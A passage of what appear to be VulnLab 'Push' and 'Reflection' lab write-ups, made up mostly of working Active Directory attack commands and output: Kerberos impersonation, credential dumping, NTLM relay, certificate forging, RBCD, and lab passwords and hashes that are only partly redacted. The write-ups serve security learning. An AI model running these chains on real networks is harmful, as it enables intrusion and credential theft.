└─$ impacket-getST -spn 'cifs/ms01.push.vl' -impersonate 'administrator' 'push.vl/puckie$:Summer2024!'  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_ms01.push.vl@PUSH.VL.ccache
                                                                                                                                        
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ export KRB5CCNAME=administrator@cifs_ms01.push.vl@PUSH.VL.ccache            

                                                                                                                                        
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-secretsdump -k ms01.push.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x1a2f736cde34f0733b3cc6f7ec68c413
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d8<redacted>61:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d7da45674bae3a0476c0f64b67121f7d:::
[*] Dumping cached domain logon information (domain/username:hash)
PUSH.VL/Administrator:$DCC2$10240#Administrator#33<redacted>09: (2023-08-31 18:27:31)
PUSH.VL/Kelly.Hill:$DCC2$10240#Kelly.Hill#b0<redacted>29: (2023-09-02 11:17:04)
PUSH.VL/sccadmin:$DCC2$10240#sccadmin#0c<redacted>5c: (2023-08-31 10:26:08)

Now that we have the Administrator hash of ms01

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ evil-winrm --ip ms01.push.vl -u 'Administrator' -H 'd8<redacted>61'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\kelly.hill\documents> dir


    Directory: C:\Users\kelly.hill\documents


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         7/25/2024   7:39 AM        1125376 SharpSCCM.exe


*Evil-WinRM* PS C:\Users\kelly.hill\documents> .\SharpSCCM.exe local site-info

  _______ _     _ _______  ______  _____  _______ _______ _______ _______
  |______ |_____| |_____| |_____/ |_____] |______ |       |       |  |  |
  ______| |     | |     | |    \_ |       ______| |______ |______ |  |  |    @_Mayyhem

[+] Connecting to \\127.0.0.1\root\CCM
[+] Executing WQL query: SELECT Name,CurrentManagementPoint FROM SMS_Authority
-----------------------------------
SMS_Authority
-----------------------------------
CurrentManagementPoint: DC01.push.vl
Name: SMS:HQ0
-----------------------------------
[+] Completed execution in 00:00:00.2090991
*Evil-WinRM* PS C:\Users\kelly.hill\documents> 


.

┌──(sccmhunter)─(puck㉿kali)-[~/vulnlab/push/sccmhunter]
└─$ python3 sccmhunter.py find -u 'sccadmin' -p '7u<redacted>JM' -dc-ip 10.10.188.181 -d push.vl -ldaps 
SCCMHunter v1.0.5 by @garrfoster
[10:15:22] INFO     [*] Checking for System Management Container.                                                    
[10:15:22] INFO     [+] Found System Management Container. Parsing DACL.                                             
[10:15:22] INFO     [-] System Management Container not found.                                                       
[10:15:22] INFO     [*] Searching LDAP for anything containing the strings 'SCCM' or 'MECM'                          
[10:15:23] INFO     [-] No results found.                                                                            
                                                                                                                     
┌──(sccmhunter)─(puck㉿kali)-[~/vulnlab/push/sccmhunter]
┌──(sccmhunter)─(puck㉿kali)-[~/vulnlab/push/sccmhunter]
└─$ python3 sccmhunter.py smb -u 'sccadmin' -p '7u<redacted>JM' -dc-ip 10.10.188.181 -d push.vl -ldaps 
SCCMHunter v1.0.5 by @garrfoster
[10:17:30] INFO     [-] No SiteServers found in database.                                                            
[10:17:30] INFO     [-] No Management Points found in database.                                                      
[10:17:30] INFO     [-] No computers found in database.

I could not solve sccadmin exploit .

It should run like below , and giving the hash in responder

PS C:\Users\kelly.hill\Documents> .\SharpSCCM.exe invoke client-push -t 10.8.2.138 -mp DC01.push.vl -sc HQ0
.\SharpSCCM.exe invoke client-push -t 10.8.2.138 -mp DC01.push.vl -sc HQ0

  _______ _     _ _______  ______  _____  _______ _______ _______ _______
  |______ |_____| |_____| |_____/ |_____] |______ |       |       |  |  |
  ______| |     | |     | |    \_ |       ______| |______ |______ |  |  |    @_Mayyhem

[+] Created "ConfigMgr Client Messaging" certificate in memory for device registration and signing/encrypting subsequent messages
[+] Reusable Base64-encoded certificate:

    308209D20201033082098E06092A864886F70D010701A082097F0482097B308209773082059006092A864886F70D010701A00207D0

[+] Discovering local properties for client registration request
[+] Modifying client registration request properties:
      FQDN: 10.8.2.138
      NetBIOS name: 10.8.2.138
      Site code: HQ0
[+] Sending HTTP registration request to DC01.push.vl:80
[+] Received unique SMS client GUID for new device:

    GUID:7D070746-617E-4763-9835-F7811A6BED54

[+] Discovering local properties for DDR inventory report
[+] Modifying DDR and inventory report properties
[+] Discovered PlatformID: Microsoft Windows NT Advanced Server 10.0
[+] Modified PlatformID: Microsoft Windows NT Workstation 2010.0
[+] Sending DDR from GUID:7D070746-617E-4763-9835-F7811A6BED54 to MP_DdrEndpoint endpoint on DC01.push.vl:HQ0 and requesting client installation on 10.8.0.233
[+] Completed execution in 00:00:06.9340974

.

As we now have the pass of user sccadmin , we do a Golden Ticket attack

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ crackmapexec smb dc01.push.vl -u "sccadmin" -p "7u<redacted>JM"          
SMB         DC01.push.vl    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:push.vl) (signing:True) (SMBv1:False)
SMB         DC01.push.vl    445    DC01             [+] push.vl\sccadmin:7u<redacted>JM 

golden Cerificate attack with certipy-ad & passthecert possible because we have system access to ms01 ( which is the CA )

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad ca -u sccadmin -p '7u<redacted>JM' -target-ip MS01.push.vl -backup
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Creating new service
[*] Creating backup
[*] Retrieving backup
[*] Got certificate and private key
[*] Saved certificate and private key to 'CA.pfx'
[*] Cleaning up
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad forge -ca-pfx CA.pfx -upn administrator@push.vl -subject 'CN=Administrator,CN=Users,DC=PUSH,DC=VL'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved forged certificate and private key to 'administrator_forged.pfx'
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad cert -pfx administrator_forged.pfx -nokey -out administrator.crt
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing certificate and  to 'administrator.crt'
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad cert -pfx administrator_forged.pfx -nocert -out administrator.key
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing private key to 'administrator.key'
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ python3 passthecert.py -action modify_user -crt administrator.crt -key administrator.key -target kelly.hill -elevate -domain push.vl -dc-host dc01.push.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Granted user 'kelly.hill' DCSYNC rights!
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-secretsdump kelly.hill@DC01.push.vl 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0d<redacted>0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d9fd5a3d1406ca03668fcd04a0b4eb09:::
push.vl\svcsql:1104:aad3b435b51404eeaad3b435b51404ee:19<redacted>85:::

That was fun 🙂

.

references used

sccm

PassTheCert

sharpcollection

 

.

 

vulnlab-reflection

vulnlab-reflection

Reflection is a medium Active Directory chain which consists of three machines, MS01, WS01 and DC01 , from MS01, MSSQL staging credentials were found from smb share, which lead to relaying the NTLM hash on DC01’s smb shares, where the service account had access to the prod share containing credentials for production database, from where we’ll get two domain credentials, abbie.smith having GenericAll on MS01 through which can read the LAPS password and further dumping the Georgia.Price password from credential vault, this user also had GenericAll on WS01, having the full access on MS01, we can perform Resource Based Constrained Delegation (RBCD) and again from dumping we’ll get Rhys.Garner ‘s password, whose password we can reuse on DOM_RGARNER who is a part of domain admin.

Writeup:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec smb ms01.reflection.vl -u 'puck' -p '' --shares

SMB         ms01.reflection.vl 445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         ms01.reflection.vl 445    MS01             [+] reflection.vl\puck: 
SMB         ms01.reflection.vl 445    MS01             [+] Enumerated shares
SMB         ms01.reflection.vl 445    MS01             Share           Permissions     Remark
SMB         ms01.reflection.vl 445    MS01             -----           -----------     ------
SMB         ms01.reflection.vl 445    MS01             ADMIN$                          Remote Admin
SMB         ms01.reflection.vl 445    MS01             C$                              Default share
SMB         ms01.reflection.vl 445    MS01             IPC$            READ            Remote IPC
SMB         ms01.reflection.vl 445    MS01             staging         READ            staging environment
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ smbclient //ms01.reflection.vl/staging      

Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jun  7 19:42:48 2023
  ..                                  D        0  Wed Jun  7 19:41:25 2023
  staging_db.conf                     A       50  Thu Jun  8 13:21:49 2023

        6261245 blocks of size 4096. 1153753 blocks available
smb: \> cat staging_db.conf
cat: command not found
smb: \> get staging_db.conf
getting file \staging_db.conf of size 50 as staging_db.conf (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \> 

---

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ cat staging_db.conf 
user=web_staging
password=Washroom510
db=staging   

mssql enum

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-mssqlclient web_staging:Washroom510@ms01.reflection.vl 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (web_staging  guest@master)> enum_users
UserName             RoleName   LoginName   DefDBName   DefSchemaName       UserID     SID   
------------------   --------   ---------   ---------   -------------   ----------   -----   
dbo                  db_owner   sa          master      dbo             b'1         '   b'01'   

guest                public     NULL        NULL        guest           b'2         '   b'00'   

INFORMATION_SCHEMA   public     NULL        NULL        NULL            b'3         '    NULL   

sys                  public     NULL        NULL        NULL            b'4         '    NULL   

SQL (web_staging  guest@master)> enum_db
name      is_trustworthy_on   
-------   -----------------   
master                    0   

tempdb                    0   

model                     0   

msdb                      1   

staging                   0   

SQL (web_staging  guest@master)> use staging;
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: staging
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'staging'.
SQL (web_staging  dbo@staging)>
SQL (web_staging  dbo@staging)> select * from staging.information_schema.tables where table_type=' BASE TABLE'
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
SQL (web_staging  dbo@staging)> select * from staging.information_schema.tables;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
staging         dbo            users        b'BASE TABLE'   

SQL (web_staging  dbo@staging)> select * from users;
id   username   password        
--   --------   -------------   
 1   b'dev01'   b'Initial123'   

 2   b'dev02'   b'Initial123'   

SQL (web_staging  dbo@staging)> 

SQL (web_staging  dbo@staging)> exec xp_dirtree '\\10.8.2.138\share',1,1;
subdirectory   depth   file   
------------   -----   ----   
SQL (web_staging  dbo@staging)> 

john svc_web_staging.hash –wordlist=/usr/share/wordlists/rockyou.txt  -> uncrackable

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-smbserver -smb2support share . 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.203.134,51852)
[*] AUTHENTICATE_MESSAGE (REFLECTION\svc_web_staging,MS01)
[*] User MS01\svc_web_staging authenticated successfully
[*] svc_web_staging::REFLECTION:aaaaaaaaaaaaaaaa:9860ed689f9394465837459e3b9ca171:01010000000000008009d71aedd8da0162c1605a968cd3de0000000001001000440075004800720044004e0043006e0003001000440075004800720044004e0043006e000200100072004b004300650052005000510056000400100072004b00430065005200500051005600070008008009d71aedd8da01060004000200000008003000300000000000000000000000003000006e4f54e6fef72023740b6b479ac0125f4ea3738055309f9f716c05e474303f3d0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] Closing down connection (10.10.203.134,51852)
[*] Remaining connections []

Next we do a NTLMrelay attack to dc01.reflection.vl

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.203.133 -i
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.10.203.134, attacking target smb://10.10.203.133
[*] Authenticating against smb://10.10.203.133 as REFLECTION/SVC_WEB_STAGING SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000
[*] SMBD-Thread-6 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-7 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-8 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-9 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-10 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-11 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-12 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-13 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!

We trigger it from our sqlshell

SQL (web_staging  dbo@staging)> exec xp_dirtree '\\10.8.2.138\share',1,1;
subdirectory   depth   file   
------------   -----   ----   
SQL (web_staging  dbo@staging)> 

and in another terminal window on my kali box

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ nc 127.0.0.1 11000                     
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
prod
SYSVOL
# use prod
# ls
drw-rw-rw-          0  Wed Jun  7 19:44:26 2023 .
drw-rw-rw-          0  Wed Jun  7 19:43:22 2023 ..
-rw-rw-rw-         45  Thu Jun  8 13:24:39 2023 prod_db.conf
# get prod_db.conf
# 

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ cat prod_db.conf 
user=web_prod
password=Tr<redacted>01
db=prod

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec mssql dc01.reflection.vl -u names.txt -p 'Tr<redacted>01' --local-auth --continue-on-success
MSSQL       dc01.reflection.vl 1433   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:DC01)
MSSQL       dc01.reflection.vl 1433   DC01             [+] web_prod:Tribesman201 
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'web_staging'.
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Administrator'.
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Guest'.
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user ''.

sqsh to dc01.reflection.vl

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ sqsh -S 10.10.203.133 -U 'web_prod' -P 'Tr<redacted>01'

sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
1> use prod;
2> go
1> select * from users;
2> go -m vert
id:       1
name:     abbie.smith
password: CM<redacted>Ew
 
id:       2
name:     dorothy.rose
password: hC<redacted>SJ
 
(2 rows affected)

ldap search

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ ldapsearch -H ldap://dc01.reflection.vl -U abbie.smith -w 'CM<redacted>Ew' -b 'DC=reflection,DC=vl' "(objectClass=user)" "*" | grep sAMAccountName | cut -d " " -f 2 > domainUsers.txt
SASL/DIGEST-MD5 authentication started
SASL username: abbie.smith
SASL SSF: 128
SASL data security layer installed.

bloodhound

bloodhound-python -d reflection.vl -c all -u 'abbie.smith' -p 'CM<redacted>Ew' -ns 10.10.203.133 --dns-tcp

check machine quota

──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec ldap dc01.reflection.vl -u "dorothy.rose" -p "hC<redacted>SJ" -M maq
SMB         dc01.reflection.vl 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
LDAP        dc01.reflection.vl 389    DC01             [+] reflection.vl\dorothy.rose:hC_fny3OK9glSJ 
MAQ         dc01.reflection.vl 389    DC01             [*] Getting the MachineAccountQuota
MAQ         dc01.reflection.vl 389    DC01             MachineAccountQuota: 0

check LAPS

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec ldap dc01.reflection.vl -u "abbie.smith" -p "CM<redacted>Ew" -M laps 
SMB         DC01            445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
LDAP        DC01            389    DC01             [+] reflection.vl\abbie.smith:CMe1x+nlRaaWEw 
LAPS        DC01            389    DC01             [*] Getting LAPS Passwords
LAPS        DC01            389    DC01             Computer: MS01$                Password: H44<redacted>}xi

check pasword used users on ws01.reflection.vl

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec smb ws01.reflection.vl -u domainUsers.txt -p "H447<redacted>}xi" --continue-on-success --local-auth
SMB         ws01.reflection.vl 445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
SMB         ws01.reflection.vl 445    MS01             [+] MS01\Administrator:H4<redacted>xi (Pwn3d!)
SMB         ws01.reflection.vl 445    MS01             [-] MS01\Guest:H4*xi STATUS_LOGON_FAILURE 
SMB         ws01.reflection.vl 445    MS01             [-] MS01\labadm:H4*xi STATUS_LOGON_FAILURE 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\DC01$:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\krbtgt:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\MS01$:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\WS01$:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] 

Do a secretsdump

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump 'ms01/administrator:H4<redacted>xi@ws01.reflection.vl' 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:38<redacted>9a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::
labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/svc_web_staging:$DCC2$10240#svc_web_staging#6123c7b97697564e016b797de99025dd: (2023-06-07 19:08:01)
REFLECTION.VL/Administrator:$DCC2$10240#Administrator#10c8403d0d68c47754170bf825ffbe9d: (2023-06-07 19:11:08)
REFLECTION.VL/Georgia.Price:$DCC2$10240#Georgia.Price#f20a83b9452ce1c17cf4a57c2b05f7ec: (2024-07-18 08:18:23)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
REFLECTION\MS01$:aes256-cts-hmac-sha1-96:f8f1905251e52be2e3c280efa37d6595579baa14e7e22dcdc776e76cc08fbf72
REFLECTION\MS01$:aes128-cts-hmac-sha1-96:b5572db5a79c069d564c0da3a7543ea0
REFLECTION\MS01$:des-cbc-md5:04340497ef8c2a31
REFLECTION\MS01$:plain_password_hex:58dc1407b76528658a71020f1bf3d26064f983ffb68ceaf6bf9781a33691791f5bb668717a5f094f71569c6b7ec629d2de911675b1d9105ebfb4fc23685385d364c0314354dadf9ed521b11413d19736edde2de06ab91c18032498f613bafa4be0dda4e394e0af1c9fca8210462ab2108331bfdfe3995f1812bc0973e63da4e3487260b5dd118ef0289e952c94b60687858a13dd81a5316984af040d66409529b44c1bf0873747f2a27ee115eba71811d33b1bdd12fcf8978ae91239e9b22c026aac009f81f5bdd44a7fb9e491af455014bf4e99cd9cc0ddab2eb5bf243eb6f578e62eb542fb9751907a6bf581d535dc
REFLECTION\MS01$:aad3b435b51404eeaad3b435b51404ee:076ebd94d605cdbf46f0bae7f55d62dc:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb7ad02ee5577322cc2a2e096b7bab17101a4f9a7
dpapi_userkey:0x9de553e3a73ece7cff322d722fc9fbdfe4fd78cc
[*] NL$KM 
 0000   C0 BE 31 EA 49 A4 51 79  67 62 D2 F1 C2 22 1C BE   ..1.I.Qygb..."..
 0010   CE 86 94 CF D5 32 5D 73  32 64 85 4C 37 81 7B AE   .....2]s2d.L7.{.
 0020   0C D1 61 83 A3 65 91 58  D6 F0 B3 17 47 5F 64 93   ..a..e.X....G_d.
 0030   A4 AC D7 4F E7 E4 A5 EE  E8 6D BE 93 7A CF 35 77   ...O.....m..z.5w
NL$KM:c0be31ea49a451796762d2f1c2221cbece8694cfd5325d733264854c37817bae0cd16183a3659158d6f0b317475f6493a4acd74fe7e4a5eee86dbe937acf3577
[*] _SC_MSSQL$SQLEXPRESS 
REFLECTION\svc_web_staging:DivinelyPacifism98
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

We use the admin account to RDP to the Box and start enumerating it

xfreerdp /f /u:administrator /p:'H44<redacted>}xi' /v:ms01.reflection.vl /cert:ignore /rfx 

on MS01 disable defender upload mimikatz.exe , we find :
Georgia.Price
DBl<redacted>id

RBCD attack op ws01.reflection.com ( via ms01 )

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump administrator@ms01.reflection.vl  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password: H44<redacted>xi

[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3819a8ecec5fd33f6ecb83253b24309a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::
labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/svc_web_staging:$DCC2$10240#svc_web_staging#6123c7b97697564e016b797de99025dd: (2023-06-07 19:08:01)
REFLECTION.VL/Administrator:$DCC2$10240#Administrator#10c8403d0d68c47754170bf825ffbe9d: (2023-06-07 19:11:08)
REFLECTION.VL/Georgia.Price:$DCC2$10240#Georgia.Price#f20a83b9452ce1c17cf4a57c2b05f7ec: (2024-07-19 09:43:54)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
REFLECTION\MS01$:aes256-cts-hmac-sha1-96:dd7df26c646dc3eab4947b81af5700127a622d4480bf217755f9b9b072f6aa1d
REFLECTION\MS01$:aes128-cts-hmac-sha1-96:c400497cd92b4b41c6a00b44f287830b
REFLECTION\MS01$:des-cbc-md5:7943755b4f326449
REFLECTION\MS01$:plain_password_hex:37e2dea970915b066f2d2b35806a0f22d10e6335a1fbee73db06f02d679b2dca0ad0a9cf9583bac1f56594df8af7494eba5c7609ddd0ac303af48b4a585f7a618b4596f241b70142d18fa970a0678ff066d41cb3ff4ee3cedf81083c64b2c1925a28fb39fd0d87172f8ae1c86fa23ab6d26068c0ace2cc2a566dae4c1581515af8c7273f5bd181eec8de2f9db0f06a8a2c4f6395d30b5e3872cde5fc21cbc0213bb59f241a3fb3bff601de5cbe893192f64310a564497307f12935a316340625e74441f689489c17fe9e6550426b27890830a261edec4a5005652878a2e47830eec7e5bb5b42772438e100f7f935d755
REFLECTION\MS01$:aad3b435b51404eeaad3b435b51404ee:c1658a71853a7f23f7ff13cd1c7ee10a:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb7ad02ee5577322cc2a2e096b7bab17101a4f9a7
dpapi_userkey:0x9de553e3a73ece7cff322d722fc9fbdfe4fd78cc
[*] NL$KM 
 0000   C0 BE 31 EA 49 A4 51 79  67 62 D2 F1 C2 22 1C BE   ..1.I.Qygb..."..
 0010   CE 86 94 CF D5 32 5D 73  32 64 85 4C 37 81 7B AE   .....2]s2d.L7.{.
 0020   0C D1 61 83 A3 65 91 58  D6 F0 B3 17 47 5F 64 93   ..a..e.X....G_d.
 0030   A4 AC D7 4F E7 E4 A5 EE  E8 6D BE 93 7A CF 35 77   ...O.....m..z.5w
NL$KM:c0be31ea49a451796762d2f1c2221cbece8694cfd5325d733264854c37817bae0cd16183a3659158d6f0b317475f6493a4acd74fe7e4a5eee86dbe937acf3577
[*] _SC_MSSQL$SQLEXPRESS 
REFLECTION\svc_web_staging:DivinelyPacifism98
[*] Cleaning up... 

then

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-rbcd -delegate-to 'ws01$' -dc-ip dc01.reflection.vl -action 'read' reflection.nl/Georgia.Price:'DB<redacted>id'


Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty

then

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-rbcd -action write -delegate-to "WS01$" -delegate-from "MS01$" -dc-ip 10.10.243.69 "Reflection/Georgia.Price:DB<redacted>id" 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] MS01$ can now impersonate users on WS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     MS01$        (S-1-5-21-3375389138-1770791787-1490854311-1104)

then

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-getST -spn 'cifs/WS01.reflection.vl' -impersonate Administrator -dc-ip 10.10.243.69 'Reflection/MS01$' -hashes ':c1658a71853a7f23f7ff13cd1c7ee10a'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_WS01.reflection.vl@REFLECTION.VL.ccache

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ export KRB5CCNAME=Administrator@cifs_WS01.reflection.vl@REFLECTION.VL.ccache  

and a secretsdump to ws01.reflection.com

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump administrator@WS01.reflection.vl -k -no-pass 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

